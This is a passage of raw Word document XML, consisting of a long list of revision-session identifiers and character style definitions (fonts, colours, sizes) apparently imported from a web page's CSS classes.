    <w:rsid w:val="32B04E06"/>
    <w:rsid w:val="32B801DF"/>
    <w:rsid w:val="332A1A5F"/>
    <w:rsid w:val="33375063"/>
    <w:rsid w:val="337323C8"/>
    <w:rsid w:val="33E705E1"/>
    <w:rsid w:val="33F61D36"/>
    <w:rsid w:val="33F76AA4"/>
    <w:rsid w:val="33FD0A06"/>
    <w:rsid w:val="340C4627"/>
    <w:rsid w:val="340F6D59"/>
    <w:rsid w:val="3419386C"/>
    <w:rsid w:val="342E368A"/>
    <w:rsid w:val="343A39FC"/>
    <w:rsid w:val="3448324D"/>
    <w:rsid w:val="345C4202"/>
    <w:rsid w:val="346A3FB6"/>
    <w:rsid w:val="34771396"/>
    <w:rsid w:val="3508666E"/>
    <w:rsid w:val="351E2523"/>
    <w:rsid w:val="351E3351"/>
    <w:rsid w:val="356760AA"/>
    <w:rsid w:val="35BD0EFA"/>
    <w:rsid w:val="35C91E43"/>
    <w:rsid w:val="35C947E7"/>
    <w:rsid w:val="35E27202"/>
    <w:rsid w:val="363A25A6"/>
    <w:rsid w:val="36787336"/>
    <w:rsid w:val="368F0A18"/>
    <w:rsid w:val="36C47EF5"/>
    <w:rsid w:val="371F6509"/>
    <w:rsid w:val="37395E52"/>
    <w:rsid w:val="3764318E"/>
    <w:rsid w:val="37824403"/>
    <w:rsid w:val="37E13AC5"/>
    <w:rsid w:val="37E20906"/>
    <w:rsid w:val="38677D1B"/>
    <w:rsid w:val="388A6D08"/>
    <w:rsid w:val="38CF6368"/>
    <w:rsid w:val="38E952A5"/>
    <w:rsid w:val="38F57FED"/>
    <w:rsid w:val="38F61862"/>
    <w:rsid w:val="39973992"/>
    <w:rsid w:val="39AB2061"/>
    <w:rsid w:val="39B94AC4"/>
    <w:rsid w:val="39BD7A20"/>
    <w:rsid w:val="39D329B8"/>
    <w:rsid w:val="39DE6EFB"/>
    <w:rsid w:val="39EE3E6A"/>
    <w:rsid w:val="39F3388A"/>
    <w:rsid w:val="3A043970"/>
    <w:rsid w:val="3A1A0330"/>
    <w:rsid w:val="3A2B251A"/>
    <w:rsid w:val="3A425759"/>
    <w:rsid w:val="3A5E19B8"/>
    <w:rsid w:val="3A644766"/>
    <w:rsid w:val="3A78235B"/>
    <w:rsid w:val="3AA74439"/>
    <w:rsid w:val="3ACA2161"/>
    <w:rsid w:val="3ADD2C94"/>
    <w:rsid w:val="3AE6194F"/>
    <w:rsid w:val="3AE93C88"/>
    <w:rsid w:val="3B463707"/>
    <w:rsid w:val="3B9423E4"/>
    <w:rsid w:val="3BA075DD"/>
    <w:rsid w:val="3BAB1263"/>
    <w:rsid w:val="3BCE783A"/>
    <w:rsid w:val="3BE51CB2"/>
    <w:rsid w:val="3D7B11A3"/>
    <w:rsid w:val="3DA42498"/>
    <w:rsid w:val="3DCB7D3B"/>
    <w:rsid w:val="3E305B0F"/>
    <w:rsid w:val="3E610800"/>
    <w:rsid w:val="3E8870FF"/>
    <w:rsid w:val="3EDE63B1"/>
    <w:rsid w:val="3F0A29E6"/>
    <w:rsid w:val="3F286F8E"/>
    <w:rsid w:val="3F885F7E"/>
    <w:rsid w:val="3FAB1245"/>
    <w:rsid w:val="3FBA7063"/>
    <w:rsid w:val="3FE9608F"/>
    <w:rsid w:val="3FFA16C1"/>
    <w:rsid w:val="402D3F9E"/>
    <w:rsid w:val="402F679A"/>
    <w:rsid w:val="407336BE"/>
    <w:rsid w:val="412D57AC"/>
    <w:rsid w:val="414C3ED8"/>
    <w:rsid w:val="41637315"/>
    <w:rsid w:val="41662227"/>
    <w:rsid w:val="41744944"/>
    <w:rsid w:val="41B51EBD"/>
    <w:rsid w:val="41C939CA"/>
    <w:rsid w:val="41ED16D5"/>
    <w:rsid w:val="42802384"/>
    <w:rsid w:val="428A5FD0"/>
    <w:rsid w:val="4290373D"/>
    <w:rsid w:val="429F4F0A"/>
    <w:rsid w:val="42C0237D"/>
    <w:rsid w:val="42C27FFF"/>
    <w:rsid w:val="42CE585B"/>
    <w:rsid w:val="42D028CF"/>
    <w:rsid w:val="42EF0063"/>
    <w:rsid w:val="43135CE2"/>
    <w:rsid w:val="432115A0"/>
    <w:rsid w:val="432F05FF"/>
    <w:rsid w:val="43642E4E"/>
    <w:rsid w:val="436B0844"/>
    <w:rsid w:val="436C4F59"/>
    <w:rsid w:val="43762175"/>
    <w:rsid w:val="43F36944"/>
    <w:rsid w:val="44346111"/>
    <w:rsid w:val="44520A1D"/>
    <w:rsid w:val="446B4E81"/>
    <w:rsid w:val="44D35968"/>
    <w:rsid w:val="44DE1BB3"/>
    <w:rsid w:val="44EA3CE7"/>
    <w:rsid w:val="452E6FB1"/>
    <w:rsid w:val="4582334D"/>
    <w:rsid w:val="45FF5F00"/>
    <w:rsid w:val="46296596"/>
    <w:rsid w:val="464E25F1"/>
    <w:rsid w:val="46AA7447"/>
    <w:rsid w:val="47234B74"/>
    <w:rsid w:val="4759788D"/>
    <w:rsid w:val="476D3876"/>
    <w:rsid w:val="479D6B2A"/>
    <w:rsid w:val="47D94AAB"/>
    <w:rsid w:val="47F90DFB"/>
    <w:rsid w:val="488E7FF0"/>
    <w:rsid w:val="489E7A48"/>
    <w:rsid w:val="48BA0613"/>
    <w:rsid w:val="48E91A24"/>
    <w:rsid w:val="49121DF3"/>
    <w:rsid w:val="492D7A6E"/>
    <w:rsid w:val="49A033FE"/>
    <w:rsid w:val="49B77494"/>
    <w:rsid w:val="49F93335"/>
    <w:rsid w:val="4A0326F2"/>
    <w:rsid w:val="4A105B9B"/>
    <w:rsid w:val="4A120EFA"/>
    <w:rsid w:val="4A20681C"/>
    <w:rsid w:val="4A3214A5"/>
    <w:rsid w:val="4A3E01D7"/>
    <w:rsid w:val="4A5375FA"/>
    <w:rsid w:val="4A9D4B03"/>
    <w:rsid w:val="4B0671BF"/>
    <w:rsid w:val="4B0C1B13"/>
    <w:rsid w:val="4B924214"/>
    <w:rsid w:val="4B9327A1"/>
    <w:rsid w:val="4BAA0092"/>
    <w:rsid w:val="4BD611DF"/>
    <w:rsid w:val="4BF53D4E"/>
    <w:rsid w:val="4C0A2F6A"/>
    <w:rsid w:val="4C243358"/>
    <w:rsid w:val="4C477BC6"/>
    <w:rsid w:val="4C524E14"/>
    <w:rsid w:val="4C7141BB"/>
    <w:rsid w:val="4C843BEA"/>
    <w:rsid w:val="4C9844F1"/>
    <w:rsid w:val="4CF10EC2"/>
    <w:rsid w:val="4CF77BF2"/>
    <w:rsid w:val="4D325BEA"/>
    <w:rsid w:val="4D3A4042"/>
    <w:rsid w:val="4D4672F0"/>
    <w:rsid w:val="4D75667A"/>
    <w:rsid w:val="4D7C0F14"/>
    <w:rsid w:val="4D7D7571"/>
    <w:rsid w:val="4D843760"/>
    <w:rsid w:val="4D9D512B"/>
    <w:rsid w:val="4DB969E2"/>
    <w:rsid w:val="4DFF6DB3"/>
    <w:rsid w:val="4E094768"/>
    <w:rsid w:val="4EBA5C72"/>
    <w:rsid w:val="4EE00B3F"/>
    <w:rsid w:val="4EE770B3"/>
    <w:rsid w:val="4F4F4E12"/>
    <w:rsid w:val="4F676806"/>
    <w:rsid w:val="4F817CD7"/>
    <w:rsid w:val="4F9D57EE"/>
    <w:rsid w:val="4FBF6664"/>
    <w:rsid w:val="4FCC3E05"/>
    <w:rsid w:val="501844FB"/>
    <w:rsid w:val="501E5C4F"/>
    <w:rsid w:val="50980306"/>
    <w:rsid w:val="50987EF5"/>
    <w:rsid w:val="50CD764F"/>
    <w:rsid w:val="51046D73"/>
    <w:rsid w:val="5133278A"/>
    <w:rsid w:val="518A02C5"/>
    <w:rsid w:val="518E5BE3"/>
    <w:rsid w:val="51966F52"/>
    <w:rsid w:val="51994DD7"/>
    <w:rsid w:val="51A17D3C"/>
    <w:rsid w:val="51C76D43"/>
    <w:rsid w:val="51CD3DC3"/>
    <w:rsid w:val="51E00027"/>
    <w:rsid w:val="5218224D"/>
    <w:rsid w:val="52197391"/>
    <w:rsid w:val="52305F2B"/>
    <w:rsid w:val="52860521"/>
    <w:rsid w:val="528E70F7"/>
    <w:rsid w:val="52B531B7"/>
    <w:rsid w:val="52BF25F1"/>
    <w:rsid w:val="52C37A9C"/>
    <w:rsid w:val="532D13B8"/>
    <w:rsid w:val="536345BC"/>
    <w:rsid w:val="538F66B8"/>
    <w:rsid w:val="53B07B50"/>
    <w:rsid w:val="53BC364B"/>
    <w:rsid w:val="54176947"/>
    <w:rsid w:val="54361BD1"/>
    <w:rsid w:val="54414054"/>
    <w:rsid w:val="544418DF"/>
    <w:rsid w:val="546011B8"/>
    <w:rsid w:val="54B03D30"/>
    <w:rsid w:val="54B12869"/>
    <w:rsid w:val="54BA376E"/>
    <w:rsid w:val="54C2672C"/>
    <w:rsid w:val="5502667A"/>
    <w:rsid w:val="551340D5"/>
    <w:rsid w:val="555A4124"/>
    <w:rsid w:val="55812117"/>
    <w:rsid w:val="55B55D69"/>
    <w:rsid w:val="561306ED"/>
    <w:rsid w:val="56494E4B"/>
    <w:rsid w:val="565257AD"/>
    <w:rsid w:val="5686205B"/>
    <w:rsid w:val="56AC3390"/>
    <w:rsid w:val="56BD4207"/>
    <w:rsid w:val="56F367F2"/>
    <w:rsid w:val="57183627"/>
    <w:rsid w:val="571A0C53"/>
    <w:rsid w:val="574F2C7E"/>
    <w:rsid w:val="578170F8"/>
    <w:rsid w:val="579208D2"/>
    <w:rsid w:val="57CC617E"/>
    <w:rsid w:val="58047224"/>
    <w:rsid w:val="58151F3B"/>
    <w:rsid w:val="583375B7"/>
    <w:rsid w:val="58682FAC"/>
    <w:rsid w:val="58A5558F"/>
    <w:rsid w:val="58D10DD3"/>
    <w:rsid w:val="58E36EA7"/>
    <w:rsid w:val="590F5772"/>
    <w:rsid w:val="59362D28"/>
    <w:rsid w:val="594C7F00"/>
    <w:rsid w:val="59573E4A"/>
    <w:rsid w:val="59797C47"/>
    <w:rsid w:val="59AF297D"/>
    <w:rsid w:val="59B41CA4"/>
    <w:rsid w:val="59C70043"/>
    <w:rsid w:val="59E52323"/>
    <w:rsid w:val="5A131E0F"/>
    <w:rsid w:val="5A647790"/>
    <w:rsid w:val="5A6C598D"/>
    <w:rsid w:val="5ACC0B67"/>
    <w:rsid w:val="5B3C7311"/>
    <w:rsid w:val="5B7D579D"/>
    <w:rsid w:val="5B800A62"/>
    <w:rsid w:val="5BBE69E4"/>
    <w:rsid w:val="5C0B6BBB"/>
    <w:rsid w:val="5C7D2B44"/>
    <w:rsid w:val="5C981461"/>
    <w:rsid w:val="5CCE03D9"/>
    <w:rsid w:val="5CF745D8"/>
    <w:rsid w:val="5D3316AC"/>
    <w:rsid w:val="5D3A01BE"/>
    <w:rsid w:val="5D873340"/>
    <w:rsid w:val="5D8A404F"/>
    <w:rsid w:val="5DA6570A"/>
    <w:rsid w:val="5DAF654E"/>
    <w:rsid w:val="5DCC65D6"/>
    <w:rsid w:val="5E0800D9"/>
    <w:rsid w:val="5E7F7C91"/>
    <w:rsid w:val="5F0360D6"/>
    <w:rsid w:val="5F48518A"/>
    <w:rsid w:val="5F541BCE"/>
    <w:rsid w:val="5F567BD5"/>
    <w:rsid w:val="5F5C55DE"/>
    <w:rsid w:val="5F6D7A7F"/>
    <w:rsid w:val="5F965111"/>
    <w:rsid w:val="5F986907"/>
    <w:rsid w:val="5FBE7301"/>
    <w:rsid w:val="5FD03BA8"/>
    <w:rsid w:val="5FD96BCD"/>
    <w:rsid w:val="5FE67318"/>
    <w:rsid w:val="5FF328C5"/>
    <w:rsid w:val="603A6C2D"/>
    <w:rsid w:val="60484D49"/>
    <w:rsid w:val="6052413D"/>
    <w:rsid w:val="6085029B"/>
    <w:rsid w:val="6097455F"/>
    <w:rsid w:val="60AF5982"/>
    <w:rsid w:val="610A5F43"/>
    <w:rsid w:val="6114105A"/>
    <w:rsid w:val="611C5767"/>
    <w:rsid w:val="613C21C9"/>
    <w:rsid w:val="61A67F1B"/>
    <w:rsid w:val="620C0D5E"/>
    <w:rsid w:val="622D0362"/>
    <w:rsid w:val="626937E7"/>
    <w:rsid w:val="626D794B"/>
    <w:rsid w:val="626E67FA"/>
    <w:rsid w:val="628E40F5"/>
    <w:rsid w:val="62997C5E"/>
    <w:rsid w:val="62E124E7"/>
    <w:rsid w:val="631C075A"/>
    <w:rsid w:val="63210A67"/>
    <w:rsid w:val="63367B34"/>
    <w:rsid w:val="63413FFB"/>
    <w:rsid w:val="63875FC8"/>
    <w:rsid w:val="63E07DF9"/>
    <w:rsid w:val="63F3026F"/>
    <w:rsid w:val="63F93871"/>
    <w:rsid w:val="64332B8F"/>
    <w:rsid w:val="64381E0B"/>
    <w:rsid w:val="644D18B9"/>
    <w:rsid w:val="644E3BB8"/>
    <w:rsid w:val="645A177E"/>
    <w:rsid w:val="647342EB"/>
    <w:rsid w:val="648223E3"/>
    <w:rsid w:val="64EA6FB1"/>
    <w:rsid w:val="659E25E2"/>
    <w:rsid w:val="65B97FB8"/>
    <w:rsid w:val="65D67EBA"/>
    <w:rsid w:val="65EC3C7C"/>
    <w:rsid w:val="66133CA7"/>
    <w:rsid w:val="66377EAC"/>
    <w:rsid w:val="66447184"/>
    <w:rsid w:val="664C7A5C"/>
    <w:rsid w:val="66794E38"/>
    <w:rsid w:val="67266846"/>
    <w:rsid w:val="674117B5"/>
    <w:rsid w:val="67411FB9"/>
    <w:rsid w:val="676257F1"/>
    <w:rsid w:val="677E7627"/>
    <w:rsid w:val="67CD000A"/>
    <w:rsid w:val="67E10F1A"/>
    <w:rsid w:val="680016AB"/>
    <w:rsid w:val="682E6588"/>
    <w:rsid w:val="68591A1B"/>
    <w:rsid w:val="68697A0E"/>
    <w:rsid w:val="689969E5"/>
    <w:rsid w:val="68CB4553"/>
    <w:rsid w:val="68F50EBB"/>
    <w:rsid w:val="691E2BB9"/>
    <w:rsid w:val="692A5CF9"/>
    <w:rsid w:val="69366368"/>
    <w:rsid w:val="69583588"/>
    <w:rsid w:val="69597ADF"/>
    <w:rsid w:val="69AA38AF"/>
    <w:rsid w:val="69F30AE7"/>
    <w:rsid w:val="69FD221D"/>
    <w:rsid w:val="6A45790E"/>
    <w:rsid w:val="6A7B2B6B"/>
    <w:rsid w:val="6A7E4100"/>
    <w:rsid w:val="6A860961"/>
    <w:rsid w:val="6A864AD6"/>
    <w:rsid w:val="6AA605A1"/>
    <w:rsid w:val="6AEF0C67"/>
    <w:rsid w:val="6AF01C29"/>
    <w:rsid w:val="6AF208EA"/>
    <w:rsid w:val="6B274303"/>
    <w:rsid w:val="6B780741"/>
    <w:rsid w:val="6B893808"/>
    <w:rsid w:val="6B9F0187"/>
    <w:rsid w:val="6BA42BD3"/>
    <w:rsid w:val="6C331A9D"/>
    <w:rsid w:val="6C386FE3"/>
    <w:rsid w:val="6C5B76C4"/>
    <w:rsid w:val="6C77427D"/>
    <w:rsid w:val="6CBC404E"/>
    <w:rsid w:val="6CCF0C79"/>
    <w:rsid w:val="6CEB60AB"/>
    <w:rsid w:val="6D493243"/>
    <w:rsid w:val="6DA7173F"/>
    <w:rsid w:val="6DD11F34"/>
    <w:rsid w:val="6E1D0885"/>
    <w:rsid w:val="6E366A0D"/>
    <w:rsid w:val="6E4077DD"/>
    <w:rsid w:val="6E5F53D0"/>
    <w:rsid w:val="6E7532BD"/>
    <w:rsid w:val="6E8431D2"/>
    <w:rsid w:val="6E8E4D9F"/>
    <w:rsid w:val="6ECC37DD"/>
    <w:rsid w:val="6EDB5E42"/>
    <w:rsid w:val="6F415BF0"/>
    <w:rsid w:val="6F62045A"/>
    <w:rsid w:val="6F7B0D7A"/>
    <w:rsid w:val="6F7C042F"/>
    <w:rsid w:val="6F7F2BD4"/>
    <w:rsid w:val="6F843D3F"/>
    <w:rsid w:val="6F926CDB"/>
    <w:rsid w:val="6F9D0A5F"/>
    <w:rsid w:val="6FB80082"/>
    <w:rsid w:val="6FFD5331"/>
    <w:rsid w:val="70171BEA"/>
    <w:rsid w:val="706A0A05"/>
    <w:rsid w:val="70846B73"/>
    <w:rsid w:val="70C05AAC"/>
    <w:rsid w:val="70E03D80"/>
    <w:rsid w:val="70F74ECE"/>
    <w:rsid w:val="716B66EC"/>
    <w:rsid w:val="718E3D1A"/>
    <w:rsid w:val="71974D6A"/>
    <w:rsid w:val="71A04D29"/>
    <w:rsid w:val="71AB0491"/>
    <w:rsid w:val="71B33B2C"/>
    <w:rsid w:val="71BD0BF9"/>
    <w:rsid w:val="72093DCB"/>
    <w:rsid w:val="72265493"/>
    <w:rsid w:val="72567E5E"/>
    <w:rsid w:val="7279343C"/>
    <w:rsid w:val="727C1224"/>
    <w:rsid w:val="72DD2049"/>
    <w:rsid w:val="72DF31E7"/>
    <w:rsid w:val="73227E9A"/>
    <w:rsid w:val="73BD3975"/>
    <w:rsid w:val="73F5138B"/>
    <w:rsid w:val="74161A91"/>
    <w:rsid w:val="74272F0D"/>
    <w:rsid w:val="743D3E49"/>
    <w:rsid w:val="74800D26"/>
    <w:rsid w:val="74AA67D3"/>
    <w:rsid w:val="74B15060"/>
    <w:rsid w:val="75057E83"/>
    <w:rsid w:val="75CE3F84"/>
    <w:rsid w:val="75D452F0"/>
    <w:rsid w:val="75E10191"/>
    <w:rsid w:val="760D19BD"/>
    <w:rsid w:val="761C3ACA"/>
    <w:rsid w:val="761E0756"/>
    <w:rsid w:val="76444377"/>
    <w:rsid w:val="76713793"/>
    <w:rsid w:val="76827E11"/>
    <w:rsid w:val="76910A5E"/>
    <w:rsid w:val="7699553D"/>
    <w:rsid w:val="76AB4CCD"/>
    <w:rsid w:val="76B3494C"/>
    <w:rsid w:val="76B54071"/>
    <w:rsid w:val="76B8781F"/>
    <w:rsid w:val="76E336B1"/>
    <w:rsid w:val="76E73F76"/>
    <w:rsid w:val="773E7F63"/>
    <w:rsid w:val="77557D01"/>
    <w:rsid w:val="775D0629"/>
    <w:rsid w:val="776A4FB6"/>
    <w:rsid w:val="77B201BB"/>
    <w:rsid w:val="77D16DBE"/>
    <w:rsid w:val="77DF3FA3"/>
    <w:rsid w:val="77E42543"/>
    <w:rsid w:val="78174F50"/>
    <w:rsid w:val="78557E70"/>
    <w:rsid w:val="78715B1E"/>
    <w:rsid w:val="78951CD1"/>
    <w:rsid w:val="789758CD"/>
    <w:rsid w:val="78A5378A"/>
    <w:rsid w:val="78C47874"/>
    <w:rsid w:val="78D15207"/>
    <w:rsid w:val="78D972E2"/>
    <w:rsid w:val="78DE64B5"/>
    <w:rsid w:val="791C570A"/>
    <w:rsid w:val="797812CA"/>
    <w:rsid w:val="7985297B"/>
    <w:rsid w:val="79F27647"/>
    <w:rsid w:val="7A257C0C"/>
    <w:rsid w:val="7A4B5CE0"/>
    <w:rsid w:val="7A522A2B"/>
    <w:rsid w:val="7A5C2140"/>
    <w:rsid w:val="7AFF3C03"/>
    <w:rsid w:val="7B560094"/>
    <w:rsid w:val="7B5E4799"/>
    <w:rsid w:val="7B6D1C5A"/>
    <w:rsid w:val="7B7B1ABF"/>
    <w:rsid w:val="7BFD0229"/>
    <w:rsid w:val="7C0509C4"/>
    <w:rsid w:val="7C3D1B9A"/>
    <w:rsid w:val="7C6B46DB"/>
    <w:rsid w:val="7C6D2494"/>
    <w:rsid w:val="7C6D5854"/>
    <w:rsid w:val="7CDB5245"/>
    <w:rsid w:val="7CE368B9"/>
    <w:rsid w:val="7D150719"/>
    <w:rsid w:val="7D2A0B1F"/>
    <w:rsid w:val="7DC01DBB"/>
    <w:rsid w:val="7DD127FA"/>
    <w:rsid w:val="7DFD2861"/>
    <w:rsid w:val="7E0D11F1"/>
    <w:rsid w:val="7E414A0A"/>
    <w:rsid w:val="7E480A5A"/>
    <w:rsid w:val="7E8B344C"/>
    <w:rsid w:val="7EC9775F"/>
    <w:rsid w:val="7F4E1A35"/>
    <w:rsid w:val="7F582DF5"/>
    <w:rsid w:val="7F645C59"/>
    <w:rsid w:val="7F6D21C4"/>
    <w:rsid w:val="7F840CFC"/>
    <w:rsid w:val="7F8A0777"/>
    <w:rsid w:val="7F9D3D2E"/>
    <w:rsid w:val="7FD47FDE"/>
    <w:rsid w:val="7FE0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4F4F4F"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F4F4F"/>
      <w:u w:val="none"/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character" w:styleId="14">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="choosed"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="first-child"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="first-child1"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="count"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999AAA"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="count1"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="555666"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="name18"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="555666"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="btn-bar"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:shd w:val="clear" w:fill="CCCCD8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="btn-bar1"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:shd w:val="clear" w:fill="CCCCD8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="quote"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="quote1"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="quote2"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="quote3"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="reward-close"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="red"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="tip2"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999AAA"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="tip3"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999999"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="hover10"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="recommend-article-type"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="8FB0C9"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="33">
    <w:name w:val="txt"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="34">
    <w:name w:val="text10"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="advert-count-people"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="advert-money"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="E33E33"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="nth-child(3n+1)"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="tip"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999AAA"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="tip1"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999999"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="text12"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="text"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="hover9"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="name"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="555666"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="hover"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
